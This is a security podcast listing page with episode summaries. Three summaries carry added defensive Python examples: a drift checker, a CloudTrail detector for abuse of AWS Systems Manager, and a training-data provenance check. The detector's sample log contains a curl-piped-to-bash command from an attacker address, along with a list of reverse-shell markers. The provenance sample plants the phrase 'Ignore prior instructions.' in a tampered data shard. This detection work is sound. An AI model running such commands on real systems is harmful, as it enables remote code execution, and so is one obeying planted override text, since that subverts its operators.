The Security Ledger Podcasts
The Security Ledger
9 episodes
8 months ago
In this, our 70th episode of The Security Ledger podcast, we speak with Xu Zou of the Internet of Things security startup Zingbox about the challenges of securing medical devices and clinical networks from cyber attack. Also: we take a look at the turmoil that has erupted around the OWASP Top 10, a list of common application security foibles. And finally: open source management vendor Black Duck Software announced that it was being acquired for more than half a billion dollars. We sit down with Black Duck CEO Lou Shipley to talk about the software supply chain and to hear what's next for his company.
Technology
Society & Culture,
News,
Tech News
Episodes (9/9)
The Security Ledger Podcasts
Episode 260: The Art of Teaching Secure Coding with Tanya Janca

In this episode of the podcast, host Paul Roberts welcomes Tanya Janca of She Hacks Purple back into the studio. Tanya talks about her newly released book: Alice and Bob Learn Secure Coding, published by Wiley and the larger problem of how to promote the teaching of secure coding practices to developers.



In today’s Security Ledger podcast, Paul welcomes the amazing Tanya Janca back to the studio. The founder of She Hacks Purple and the We Hack Purple community, Tanya does secure coding training and developer relations at SemGrep. She’s a passionate advocate for teaching secure development practices and promoting secure application design.

In our conversation, Tanya dives deep into her new book, “Alice and Bob Learn Secure Coding,” a guide to secure coding for everyone from new to experienced developers. We unravel her journey from writing code to becoming a recognized expert in application security and secure software.

Tanya Janca is the founder of She Hacks Purple

Her journey highlights one of the software industry’s quirks: while the path to becoming a developer is straightforward, the paths to doing application security as a profession are seemingly arbitrary. Tanya’s own experiences underscore the need for secure coding to be intrinsic to every software developer’s education. That was the inspiration for her new book, after Wiley’s Jim Minitel prompted her to write the book she would have wanted to read when making the transition from developer to application security professional.

Bridging the Gap Between Developers and Security

One of the big issues that complicates efforts to improve software security is the gap between security and development teams. Contrary to popular belief, software developers and security teams operate in distinct realms with distinct skill sets, and are often siloed within software development organizations.

This divergence calls for tailored approaches to instill security practices in software development, something her new book aims to achieve by addressing practical methodologies rather than dwelling solely on vulnerabilities.

In Alice and Bob Learn Secure Coding, Tanya explores the full breadth of secure coding practices, highlighting the importance of holistic practices across languages, frameworks, and technologies. She calls for a shift from relying on scare tactics to fostering a proactive, security-minded culture in software development teams. That includes a shift from the current focus on features and rapid release cycles to robust security measures. Tanya encourages developers to question existing norms and engage in conversations that could shift project trajectories towards more secure outcomes. That might include everything from questioning data permissions in application development to advocating for mandatory cybersecurity education for students and young software engineers.

“If you learn secure coding, you’re going to have less bugs later, which means you have less things to do later. If you are not creating the bugs in the first place, everything’s better, right? You save money, you save time, all these things.” — Tanya Janca, She Hacks Purple

One solution might be greater governmental involvement to establish robust cybersecurity...
8 months ago
36 minutes 32 seconds

Security Validation: A Deep Dive with Cymulate’s David Kellerman

In this Spotlight episode of The Security Ledger Podcast, Paul speaks with David Kellerman, the Field CTO at Cymulate, about the growing complexity of the cyber threat landscape and of IT security deployments. David and I delve into the growing demand for security validation technology, like Cymulate’s, that allows organizations to assess the utility and effectiveness of their security investments.




Cyber threats and attacks are metastasizing, and proposed solutions along with them. That’s been the dynamic for decades, as new cybersecurity tools and technologies emerge in response to changes in the threat landscape: a steady march from firewalls to AV to intrusion detection, DLP, application firewalls, EDR, and on and on.

But as IT deployments, and the landscape of cybersecurity solutions, have become more crowded and complex, security teams are under pressure to re-think their investments: focusing energy, resources and attention on the tools that actually work, addressing real world problems and lowering risk. The question: how do you know which security tools are providing the best protection? Another question: is your organization making the most of the tools it already has to address the risks and security exposures that are most relevant to your firm?

Enter the fast growing field of security validation: AI-powered technology that allows organizations to simulate malicious attacks and assess the effectiveness of existing or proposed security solutions as they seek to block or respond to attacks. It’s a market that Cymulate, the Israel-based maker of automated security validation tools, knows well.

In our latest Spotlight Podcast, I am joined by David Kellerman, Field CTO at Cymulate. Together, we delve into the ever-evolving landscape of cybersecurity and the significance of security validation technology as threats and sophisticated attacks mount. Cymulate’s technology focuses on threat exposure: allowing firms to continuously test and optimize their security with a focus on the exploitable risks within their environment that are most likely to be abused by malicious actors.

While companies these days often have the necessary tools on hand to secure their assets, the challenge lies in their optimization and implementation, David tells me. Security drift is also a concern: the gradual erosion of protective measures as the environment inevitably changes, such as configurations that are relaxed, or altered unexpectedly, in ways that open up vulnerabilities. And David stresses the importance of moving beyond default configurations to ensure maximum efficacy against evolving threats.
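A minimal form of the drift check David describes, as an added example that is not Cymulate’s code: a baseline of expected control settings is compared with a current snapshot, and a control is reported only when it has moved in the weakening direction (a tamper-protection switch flipped off, an inbound allowlist that grew, a TLS floor lowered or removed), so a setting that was tightened since the baseline is not noise. The control names, the per-control policy, the baseline and the snapshot are all constructed for illustration.

```python
"""Security drift check: compare a baseline of expected control settings
against a current snapshot and report every control that has weakened.

Added example, not Cymulate's code. Control names, the policy table, the
baseline and the snapshot are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Any

# How each control is allowed to move relative to the baseline:
#   "exact"  - must not change at all (on/off switches, default actions)
#   "min"    - must not fall below the baseline (lengths, protocol floors)
#   "max"    - must not rise above the baseline (timeouts, lifetimes)
#   "subset" - an allowlist must not gain entries it did not have before
CONTROL_POLICY = {
    "edr.tamper_protection": "exact",
    "edr.realtime_scanning": "exact",
    "firewall.inbound_default": "exact",
    "firewall.inbound_allowed_ports": "subset",
    "password.min_length": "min",
    "session.idle_timeout_minutes": "max",
    "tls.min_version": "min",
}


@dataclass(frozen=True)
class Drift:
    control: str
    baseline: Any
    current: Any
    reason: str


def _weakened(policy, baseline, current):
    """True when `current` is a weaker setting than `baseline` under `policy`."""
    if policy == "exact":
        return baseline != current
    if policy == "min":
        return current < baseline
    if policy == "max":
        return current > baseline
    if policy == "subset":
        return not set(current) <= set(baseline)
    raise ValueError(f"unknown policy {policy!r}")


def find_drift(baseline, current):
    """Return the controls that drifted, in CONTROL_POLICY order.

    A control missing from the snapshot is drift too: a control you can no
    longer observe is a control you can no longer trust.
    """
    drifts = []
    for control, policy in CONTROL_POLICY.items():
        if control not in current:
            drifts.append(Drift(control, baseline[control], None,
                                "control missing from snapshot"))
            continue
        b, c = baseline[control], current[control]
        if not _weakened(policy, b, c):
            continue
        if policy == "subset":
            reason = f"allowlist gained {sorted(set(c) - set(b))}"
        else:
            reason = f"{policy} policy violated: baseline {b!r}, now {c!r}"
        drifts.append(Drift(control, b, c, reason))
    return drifts


# Constructed baseline, as recorded when the controls were last validated.
BASELINE = {
    "edr.tamper_protection": True,
    "edr.realtime_scanning": True,
    "firewall.inbound_default": "deny",
    "firewall.inbound_allowed_ports": [443],
    "password.min_length": 14,
    "session.idle_timeout_minutes": 15,
    "tls.min_version": 1.2,
}

# Constructed snapshot taken later: tamper protection off, RDP opened, the
# password floor raised (not drift), and the TLS floor no longer reported.
CURRENT_SNAPSHOT = {
    "edr.tamper_protection": False,
    "edr.realtime_scanning": True,
    "firewall.inbound_default": "deny",
    "firewall.inbound_allowed_ports": [443, 3389],
    "password.min_length": 16,
    "session.idle_timeout_minutes": 15,
}

if __name__ == "__main__":
    for d in find_drift(BASELINE, CURRENT_SNAPSHOT):
        print(f"{d.control}: {d.reason}")
```

The per-control policy is the part worth keeping: a plain diff of two config dumps flags the raised password floor as a change, which trains people to ignore the report, while a directional comparison reports only the three settings that actually got weaker.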



Understanding Security Validation



In our discussion, David highlights Cymulate’s core mission: empowering security teams to validate and optimize their security controls: simulating attacks and enabling companies to measure the effectiveness of their cybersecurity defenses. This approach allows businesses to identify vulnerabilities a...
9 months ago
30 minutes 49 seconds

Pacific Rim: Sophos’ 6 Year Battle To Beat Back China State Hackers

In this episode of The Security Ledger Podcast (#259) Paul speaks with Ross McKerchar, the CISO of Sophos, about the company’s recent, headline grabbing report on a six year, state sponsored hacking campaign it dubbed Pacific Rim. Ross talks about the company’s dawning awareness of the extent and sophistication of the operation, and its use of a targeted software implant to monitor the workings of the state-sponsored group and stay a step ahead of the hackers’ efforts to breach Sophos and its customers.




After so many decades writing about hair raising cyber attacks, it is easy to get jaded, and hard to be impressed. And then something like the Pacific Rim report comes along. Released last month by the UK-based cybersecurity firm Sophos, Pacific Rim is an eyebrow-raising account of a years-long battle with persistent and sophisticated hackers based in China who were determined to compromise Sophos and use their access to target the company’s customers.

Ross McKerchar is the CISO at Sophos.

A six year stealth campaign

The Sophos Pacific Rim report paints a detailed picture of a relentless nation-state level cyber assault that was years in the making. The attack, emanating from a well-resourced group of PRC-based actors, wasn’t a conventional one-off breach but rather a protracted, six-year campaign involving a wide range of entities and software assets across regions, beginning in India with the compromise of a low-privilege computer used to drive a wall-mounted display at Cyberoam, a company Sophos had acquired. From there, the attackers used “living off the land” techniques to move into other systems, exploiting vulnerabilities to gain unauthorized access to sensitive areas, all the while showcasing advanced techniques that far exceeded low-skill script kiddie tactics and raised concerns about the breadth of their capabilities.

ORBs and AWS: China’s sophisticated hacking techniques

In this podcast, I sat down with Ross McKerchar to dig into the Pacific Rim incident. Ross and I talk about his company’s quick realization that what appeared to be a run-of-the-mill intrusion onto Cyberoam’s network was much more: one branch of a global campaign by Chinese-backed hacking groups to gain access to a wide range of sensitive targets, from tech firms to critical infrastructure providers to government agencies and embassies.

Ross and I discuss the evolution of attack methodologies by China-based threat groups, as well as the many characteristics that made Pacific Rim stand out, such as the attackers’ use of cloud management tooling like AWS Systems Manager (SSM) to extend their reach inside compromised environments, and “ORBs” (operational relay boxes), purpose built networks of compromised devices that hacking groups use as a foundation for further attacks.
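The living-off-the-land pattern Ross describes has a cloud-side signature: an attacker holding stolen AWS credentials can run commands on every SSM-managed instance through the service’s own SendCommand and StartSession APIs, never touching the instances over the network, so the place to look is CloudTrail rather than the hosts. Below is an added example, not from Sophos or the Pacific Rim report, of that detection run over a few constructed CloudTrail records. The CloudTrail field names (eventSource, eventName, userIdentity.arn, sourceIPAddress, requestParameters) are the real ones; the account id, role names, instance ids, IP ranges, the allowlist of expected principals and the list of suspicious command markers are assumptions for the example.

```python
"""Flag abuse of AWS Systems Manager (SSM) for remote code execution, using
CloudTrail records.

Added example, not from Sophos or the Pacific Rim report. The account id, role
names, instance ids, IP ranges and the allowlists below are constructed; the
CloudTrail field names are the real ones.
"""
import ipaddress
import json

# Principals expected to execute commands through SSM (constructed allowlist).
EXPECTED_PRINCIPALS = {
    "arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-bot",
}
# Source ranges from which administrative API calls are expected (constructed).
EXPECTED_SOURCES = [ipaddress.ip_network("203.0.113.0/24")]
# SSM actions that execute code or open an interactive shell on an instance.
EXEC_ACTIONS = {"SendCommand", "StartSession"}
# Substrings in a command body that usually mean a staged payload or a reverse
# shell rather than routine administration (constructed, extend for your fleet).
SUSPICIOUS_MARKERS = ("curl ", "wget ", "/dev/tcp/", "base64 -d", "nc ", "bash -i")

# Constructed CloudTrail records, one JSON object per line: a routine patch run,
# an audit role pulling a script from the Internet into a shell, the same role
# opening a session on that instance, and a harmless inventory call.
SAMPLE_CLOUDTRAIL = r"""
{"eventSource":"ssm.amazonaws.com","eventName":"SendCommand","sourceIPAddress":"203.0.113.10","userIdentity":{"arn":"arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-bot"},"requestParameters":{"documentName":"AWS-RunPatchBaseline","instanceIds":["i-0a1b2c3d4e5f60001"],"parameters":{"Operation":["Install"]}}}
{"eventSource":"ssm.amazonaws.com","eventName":"SendCommand","sourceIPAddress":"198.51.100.77","userIdentity":{"arn":"arn:aws:sts::111122223333:assumed-role/ReadOnlyAudit/jdoe"},"requestParameters":{"documentName":"AWS-RunShellScript","instanceIds":["i-0a1b2c3d4e5f60002"],"parameters":{"commands":["curl -s http://198.51.100.77/x | bash -i"]}}}
{"eventSource":"ssm.amazonaws.com","eventName":"StartSession","sourceIPAddress":"198.51.100.77","userIdentity":{"arn":"arn:aws:sts::111122223333:assumed-role/ReadOnlyAudit/jdoe"},"requestParameters":{"target":"i-0a1b2c3d4e5f60002"}}
{"eventSource":"ssm.amazonaws.com","eventName":"DescribeInstanceInformation","sourceIPAddress":"203.0.113.10","userIdentity":{"arn":"arn:aws:sts::111122223333:assumed-role/PatchAutomationRole/patch-bot"},"requestParameters":{}}
"""


def load_events(cloudtrail_jsonl):
    """Parse one CloudTrail record per non-empty line."""
    return [json.loads(line) for line in cloudtrail_jsonl.splitlines() if line.strip()]


def _command_text(event):
    """Join the shell commands carried by a SendCommand request, if any."""
    params = event.get("requestParameters") or {}
    commands = (params.get("parameters") or {}).get("commands") or []
    return " ".join(commands)


def score_event(event):
    """Return the reasons an SSM event looks like abuse; empty list if benign."""
    if event.get("eventSource") != "ssm.amazonaws.com":
        return []
    if event.get("eventName") not in EXEC_ACTIONS:
        return []
    reasons = []
    principal = (event.get("userIdentity") or {}).get("arn", "")
    if principal not in EXPECTED_PRINCIPALS:
        reasons.append(f"unexpected principal {principal}")
    src = event.get("sourceIPAddress", "")
    try:
        ip = ipaddress.ip_address(src)
        if not any(ip in net for net in EXPECTED_SOURCES):
            reasons.append(f"source {src} outside expected ranges")
    except ValueError:
        # AWS-internal callers put a service name here instead of an IP.
        pass
    hits = [m for m in SUSPICIOUS_MARKERS if m in _command_text(event)]
    if hits:
        reasons.append(f"command contains {hits}")
    return reasons


def scan(cloudtrail_jsonl):
    """Return (eventName, principal arn, reasons) for every flagged record."""
    findings = []
    for event in load_events(cloudtrail_jsonl):
        reasons = score_event(event)
        if reasons:
            findings.append((event["eventName"], event["userIdentity"]["arn"], reasons))
    return findings


if __name__ == "__main__":
    for name, who, why in scan(SAMPLE_CLOUDTRAIL):
        print(name, who, "; ".join(why))
```

The principal allowlist is the strongest of the three signals: a role that exists to audit should never be the one issuing AWS-RunShellScript, and that holds even when the command body looks innocuous and the source address is inside the corporate range (which an ORB sitting on a compromised office device would be).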



A timeline of the Pacific Rim campaign. (Image courtesy of Sophos.)


11 months ago
33 minutes 43 seconds

Episode 258: Broken Brokers – Optery’s Fight To Claw Back Your Personal Data

In this episode of The Security Ledger Podcast (#258) Paul speaks with Lawrence Gentilello, the co-founder and CEO of Optery, a startup in the personal data management space. Lawrence and I talk about the growing scandal around breaches at firms like AT&T and data brokers that have exposed the sensitive data on hundreds of millions of Americans to cyber criminals, and how Optery and firms like it are looking to empower consumers to claw their data back from these porous data brokers.



If you are like me and subscribe to an identity protection service, your phone likely blew up in early August with foreboding messages that your email, Social Security Number and other information had turned up on “the dark web” – that massive constellation of sites invisible to search engines where malicious actors and stolen data congregate.



The cause? A huge breach of the data broker NationalPublicData that likely contained information on more than 130 million Americans, dead and alive, according to an estimate by Troy Hunt of HaveIBeenPwned. Hunt was quoted in a report on the breach by Brian Krebs over at Krebs on Security. NationalPublicData issued a statement on August 12th acknowledging “incidents” that it claims began with an effort to “hack into data” in December 2023, and that led to “leaks of certain data” in April 2024 and “summer 2024.” (Umm… for those of us in the Northern Hemisphere, isn’t “summer 2024” now?!)



The information breached included names, email addresses, phone numbers, social security numbers, and mailing addresses, NationalPublicData said.



And, if you’re like me, this probably isn’t the first time this year that you’ve been inundated with warnings about your personal data being at risk. Just weeks before the NationalPublicData breach came to light, there were similar warnings in the wake of a massive breach of telecommunications giant AT&T. That company acknowledged in mid July that it was the victim of a cyber attack on a third party cloud storage provider in April that disgorged records of calls and texts for nearly all AT&T cellular customers – hundreds of millions of people. That’s an almost unmatched treasure trove of information for nation state actors that could easily be used to help reconstruct their social networks, patterns of communications and even their physical locations, as the Mozilla Foundation noted in its analysis.



Houston, We’ve Got Your Data!



So, “Houston, we’ve got a problem!” Or maybe “Houston, we’ve got your data!” 🙂



Private firms have been harvesting, storing and monetizing mountains of our personal data, gleaned from our movements, behaviors and financial activity online. But – as is abundantly clear- those firms are not particularly careful about protecting that data from malicious actors. Nor are they transparent about how the data they’ve collected is being stored and used.
1 year ago
36 minutes 16 seconds

Spotlight Podcast: OT Is Under Attack. Now What?

In this Spotlight episode of the Security Ledger podcast, I interview Chris Walcutt, the CSO of DirectDefense about the rising cyber threats facing operational technology (OT). Chris and I talk about how industry is responding – including the growing role of government, ISACs and managed security services providers (MSSPs) in helping shore up the security of critical infrastructure.



There is no question that critical infrastructure and the operational technologies that are used to support that infrastructure are in the cross hairs of state actors and – in many cases – under active attack. The question is: what to do about it.



Chris Walcutt is the Chief Security Officer at DirectDefense.


Volt Typhoon: Is The Coming Storm Already Here?



In March, for example, CISA, the US Cybersecurity and Infrastructure Security Agency, warned the heads of critical infrastructure organizations about the ongoing activities of “Volt Typhoon,” an advanced persistent threat (APT) group linked to China’s military. A February advisory issued by CISA, the NSA and the FBI asserted that People’s Republic of China (PRC) state-sponsored cyber actors are positioning themselves on IT networks and maintaining persistent access in anticipation of launching “disruptive or destructive cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict” with the U.S.



Critical Infrastructure And Digital Transformation: A Risky Combination



Campaigns like that aren’t new. Warnings about state sponsored actors sniffing around U.S. critical infrastructure go back more than a decade. What has changed is the exposure of industrial firms to cyber attacks, as “digital transformation” and the explosion of remote work have resulted in organizations that own and operate critical infrastructure being far more vulnerable to attacks and compromises.



Add to that the high social and economic impacts of critical infrastructure attacks; the varied nature of OT systems (and risks); endemic shortages of cybersecurity talent; and – in many sectors – inadequate budgeting to support cyber operations and you have a recipe for disaster.



Securing OT Systems: Help Is On The Way



But all is not lost. In our latest Spotlight podcast, recorded on the sidelines of the RSA Conference in San Francisco last month, I sat down with Chris Walcutt, the Chief Security Officer at DirectDefense.



Chris and I talked about the rapidly changing threat landscape that critical infrastructure owners and operators inhabit, and how savvy firms are managing OT risks – in part by tapping managed security services firms with expertise managing and securing OT systems and environments.



In our conversation, Chris elaborates on the distinction between OT (Operational Technology) and IT, emphasizing the unique challenges in securing OT systems like those in critical infrastructure,
1 year ago

Spotlight Podcast: CSO Chris Walcutt on Managing 3rd Party OT Risk

In this Spotlight episode of the Security Ledger podcast, I interview Chris Walcutt of DirectDefense about the rising cyber threats facing operational technology (OT). Chris and I talk about how organizations that manage OT – including critical infrastructure owners – are being targeted by sophisticated cyber actors and the strategies best suited to manage increased cyber risks to OT environments.



Cyber attacks on critical infrastructure have gone, in the past two decades, from the hypothetical to the actual to the epidemic. Today, malicious actors from cybercriminal ransomware gangs to nation-state affiliated hacking groups are teeing up vulnerable operational technology (OT) environments. As CISA noted in a February advisory about Chinese infiltration of critical infrastructure providers, the goal of many of these groups is long term persistence and, eventually, disruption of critical functions such as power distribution at a time of their choosing.



Christopher Walcutt is the CSO at DirectDefense


How should companies respond to the increasing risks to OT systems and environments? In our latest Spotlight episode of the Security Ledger podcast, I sat down with Christopher Walcutt, Chief Security Officer at DirectDefense, to talk about the changing cybersecurity landscape for critical infrastructure and the challenges (as well as the solutions) that organizations face today.



Chris’s Cybersecurity Journey



Christopher’s path to infosec is a testament to the many unexpected routes leading to cybersecurity expertise. Starting out on a help desk at a Fortune 200 energy firm, Chris worked his way up to roles as a system administrator and network engineer, eventually taking the IT helm at a power provider with a portfolio of over 30 North American plants, including three nuclear facilities.



Chris’s time in the industry saw the inception of NERC CIP regulations – the first cybersecurity rules directed at critical infrastructure (with the exception of nuclear facilities). Since then, the dialogue about cybersecurity has evolved from a focus on checking compliance checkboxes to addressing cybersecurity as an existential organizational risk amid mounting threats and attacks. Chris and I dig deep on this paradigm shift, and the growing focus within critical infrastructure sectors on resilience vs. simple compliance.



Addressing the Human Factor in OT Cybersecurity



While OT environments present a number of technical challenges, many of the most significant risks facing them stem from “layer 8,” in other words the human factor. As Chris and I discuss, social engineering is the first step in many sophisticated attacks. Accordingly, Chris stresses the importance of security training for employees that is focused on creating memorable learning experiences. For example, by sharing real-world examples as part of awareness education, organizations can discuss the practical measures they use to bolster defenses against sophisticated cyberattacks, underscoring the nuanced nature of cybersecurity threats, which defy purely technical solutions.



1 year ago
35 minutes 42 seconds

Spotlight Podcast: How AI Is Reshaping The Cyber Threat Landscape

In this Spotlight episode of the Security Ledger podcast, I interview Jim Broome, the President and CTO of the managed security service provider DirectDefense. Jim and I talk about the findings of DirectDefense’s latest Security Operations Threat Report and dig into the intriguing ways artificial intelligence (AI) is shaping both cyberattack and defense automation strategies.



One of the things I’ve noticed is that the growth and evolution of the cybersecurity industry has been so rapid – encompassing a bit more than two decades – that you can sit down for an interview with someone who is simultaneously in the prime of their career and an “OG” who has personally witnessed the birth, awkward adolescence and rapid maturity of the information security space.



Jim Broome is the President and CTO at DirectDefense.


That was my experience sitting down with Jim Broome, the President and Chief Technology Officer at DirectDefense, a managed security service provider. Jim’s journey to cyber started back in the 80s as the son of a Radio Shack franchise owner in the southern U.S. By high school, Jim had thrown himself into the nascent Internet, launching one of the biggest BBSes (bulletin board systems) in Georgia, a community that was ultimately acquired by CompuServe, an early consumer-focused Internet service provider.



After graduating from Georgia Tech, Jim started his career as so many others did: working as an IT administrator supporting customers and rolling out networks for banks and other early adopters of networked technologies. He went on to work for an early CheckPoint reseller at a time when “network firewall” was a term that would get you cocked heads and strange looks from business owners. Jim eventually found his way to the seminal cybersecurity firm Internet Security Systems (ISS) in the late 1990s, working alongside the likes of Caleb Sima, where he was among the first wave of hands-on cyber practitioners helping companies to assess their cyber risk.



DirectDefense’s 2024 Security Operations Threat Report


All that history gives Jim a unique perspective on the current state of cyber security, which we talk about in this Security Ledger Spotlight Podcast. In it, Jim looks back on the early challenges of cybersecurity, the diversification of threats over the decades, and the factors that are driving our current epidemic of cyber attacks, including the rapid embrace of artificial intelligence (AI) by both attackers and defenders.



Jim and I also dig into the highlights from the latest DirectDefense Security Operations Threat Report and get Jim’s views on the current landscape of cybersecurity, including the growing problem of attacks on multi-factor authentication and the importance of adaptive defense mechanisms. We also touch on the critical role of MSSPs in covering a cybersecurity skills and coverage gap.



1 year ago
37 minutes 10 seconds

Episode 257: Securing Software on Wheels with Dennis Kengo Oka of Synopsys

In this episode of The Security Ledger Podcast (#257) Paul speaks with Dennis Kengo Oka, a senior principal automotive security strategist at the firm Synopsys about the growing cyber risks to automobiles as connected vehicle features proliferate in the absence of strong cybersecurity protections.



Almost from the get-go, automobiles symbolized a kind of dynamic and restless American identity. The auto industry epitomized the U.S.’s vibrant and innovative economy. With the help of some serious federal dollars, cars also became indispensable parts of 20th century American life. By the 1950s, accepted wisdom was that automobiles and the automotive industry were inextricably linked to the well being of the U.S.: what’s good for GM is good for the United States, and vice versa, as the saying went.



Dennis Kengo Oka is a senior principal automotive security strategist.


But all that romanticizing of cars and the cheerleading of the powerful and influential auto industry forestalled much-needed oversight of vehicles. The auto industry fought calls for federal auto safety rules and requirements for decades, arguing that driver error and unsafe roads were responsible for accidents, not their vehicles.



A four decade delay in vehicle safety regulation



It wasn’t until the mid 1960s that Congress got around to passing the National Traffic and Motor Vehicle Safety Act in the wake of the publication of Ralph Nader’s Unsafe at Any Speed – an expose of how the auto industry prioritized style and features over safety. By that time, automobile accidents were responsible for 49,000 deaths, 1.8 million minor injuries, and $8.5 billion in damages, lost wages, and medical expenses annually. (By comparison, 46,980 people died in auto accidents in the U.S. in 2021, despite the fact that the number of registered vehicles on the roads has more than tripled in the intervening years, from around 90 million vehicles in 1965 to more than 280 million in 2021.)



Since then, the auto industry’s tune on vehicle safety has done a 180 degree turn. Safety features -like airbags and collision avoidance – and vehicle safety ratings are, today, a key selling point for cars. But that focus on safety doesn’t extend to the software that increasingly runs our vehicles.



Vehicle safety? Critical! Vehicle software safety…umm….



As with the advent of the automobile in the first decades of the 20th century, the arrival of the “smart car” in the first decades of the 21st century has transpired as an industry-led initiative transpiring in a vacuum of government oversight, regulation and guidance. The result: exploitable cyber-physical software flaws were documented starting as early as 2011, with a dramatic display of the potential to use software...
1 year ago
34 minutes 9 seconds

Episode 256: Recursive Pollution? Data Feudalism? Gary McGraw On LLM Insecurity

In this episode of The Security Ledger Podcast (#256) Paul speaks with Gary McGraw of the Berryville Institute of Machine Learning (BIML), about that group’s latest report: an Architectural Risk Analysis of Large Language Models. Gary and Paul talk about the many security and integrity risks facing large language model machine learning and artificial intelligence, and how organizations looking to leverage artificial intelligence and LLMs can insulate themselves from those risks.



Four years ago, I sat down with Gary McGraw in the Security Ledger studio to talk about a report released by his new project, The Berryville Institute of Machine Learning. That report, An Architectural Risk Analysis of Machine Learning Systems, included a top 10 list of machine learning security risks, as well as some security principles to guide the development of machine learning technology.



Gary McGraw is the co-founder of the Berryville Institute of Machine Learning



The concept of cyber risks linked to machine learning and AI was, back then, mostly hypothetical. Artificial Intelligence was clearly advancing rapidly, but, with the exception of cutting edge industries like high tech and finance, its actual applications in everyday life (and business) were still matters of conjecture.



An update on AI risk



Four years later, A LOT has changed. With the public launch of OpenAI’s ChatGPT in late 2022 and of its GPT-4 large language model (LLM) in March 2023, the uses and applications of AI have exploded. Today, there is hardly any industry that isn’t looking hard at how to apply AI and machine learning technology to enhance efficiency, improve output and reduce costs. In the process, the issue of AI and ML risks and vulnerabilities, from “hallucinations” and “deep fakes” to copyright infringement, has also moved to the front burner.



Back in 2020, BIML’s message was one of cautious optimism: while threats to the integrity of machine learning systems were real, there were things that the builders and users of those systems could do to manage the risks. For example: scrutinizing critical components like data set assembly (where the data that trained the model came from); the actual data sets themselves; the learning algorithms used; and the evaluation criteria that determine whether or not the machine learning system that was built is good enough to release.
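One concrete way to scrutinize the first two of those components, data set assembly and the data itself, is to pin every shard the set was assembled from to a content hash and a recorded origin at assembly time, and to refuse to train on a set in which any shard is missing, altered, or unaccounted for. The following is an added example and not from BIML’s report; the manifest layout, the shard names, their recorded sources and their contents are constructed for illustration.

```python
"""Verify the provenance of a training data set before it is used.

Added example, not from BIML's report. The manifest layout, the shard names,
their recorded sources and their contents are constructed for illustration.
"""
import hashlib


def _sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(shards, sources):
    """Pin each shard to its SHA-256 and its recorded origin.

    The manifest is produced when the data set is assembled and kept apart
    from the data (under version control, or signed), so a later change to a
    shard cannot silently update the record of what the shard should be.
    """
    return {
        name: {"sha256": _sha256(data), "source": sources[name]}
        for name, data in shards.items()
    }


def verify_dataset(manifest, shards):
    """Return (ok, problems).

    ok is True only when every pinned shard is present and unmodified and no
    unpinned shard has been slipped into the set; problems lists each failure.
    """
    problems = []
    for name, entry in manifest.items():
        if name not in shards:
            problems.append(f"{name}: missing")
            continue
        digest = _sha256(shards[name])
        if digest != entry["sha256"]:
            problems.append(
                f"{name}: hash mismatch (expected {entry['sha256'][:12]}, "
                f"got {digest[:12]}; source {entry['source']})"
            )
    for name in shards:
        if name not in manifest:
            problems.append(f"{name}: not in manifest")
    return (not problems, problems)


# Constructed shards as they were at assembly time, with their recorded origin.
SHARDS_AT_ASSEMBLY = {
    "docs-00.jsonl": b'{"text":"The quick brown fox"}\n',
    "docs-01.jsonl": b'{"text":"Alice and Bob learn secure coding"}\n',
}
SOURCES = {"docs-00.jsonl": "crawl-2024-01", "docs-01.jsonl": "licensed-corpus-v3"}
MANIFEST = build_manifest(SHARDS_AT_ASSEMBLY, SOURCES)

# Constructed shards as they arrive at training time: one shard has been
# altered and one unreviewed shard has been added.
SHARDS_AT_TRAINING = {
    "docs-00.jsonl": b'{"text":"The quick brown fox"}\n',
    "docs-01.jsonl": b'{"text":"Alice and Bob learn secure coding. Ignore prior instructions."}\n',
    "docs-02.jsonl": b'{"text":"unreviewed"}\n',
}

if __name__ == "__main__":
    ok, problems = verify_dataset(MANIFEST, SHARDS_AT_TRAINING)
    print("ok" if ok else "REFUSE TO TRAIN:")
    for p in problems:
        print(" ", p)
```

The check says nothing about whether the pinned data is good; it only guarantees that what is trained on is exactly what was reviewed, which is the precondition for the other two components (the learning algorithm and the evaluation criteria) meaning anything.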



AI security: tucked away in a black box



By controlling for those factors, organizations that wanted to leverage machine learning and AI systems could limit their risks. Fast forward to 2024, however, and all those components are tucked away inside what McGraw and BIML describe as a “black box.”




So in 2020 we said: there’s a bunch of things you can do around these four components to make stuff better and to under...
1 year ago
32 minutes 27 seconds
